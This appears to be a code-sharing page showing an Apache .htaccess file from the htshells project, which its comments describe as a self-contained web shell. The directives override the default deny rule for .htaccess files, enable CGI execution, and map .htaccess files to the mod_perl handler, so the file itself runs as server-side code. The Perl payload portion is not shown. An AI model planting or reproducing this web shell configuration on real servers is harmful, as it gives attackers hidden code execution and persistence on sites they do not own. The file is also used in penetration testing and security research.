0xBADCA7/htshells/master/shell/mod_perl.shell.htaccess - Htaccess File

0xBADCA7/htshells/master/shell/mod_perl.shell.htaccess

# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^.ht">
# Uncomment the line below for Apache2.4 and newer
# Require all granted
    Order allow,deny
    Allow from all
</Files>

# Enable  CGI
Options +ExecCGI

# Make apache treat .htaccess files as mod_perl scripts
AddHandler perl-script .htaccess

On Github License

Files

Download PDF of Htaccess file

Comments

Apache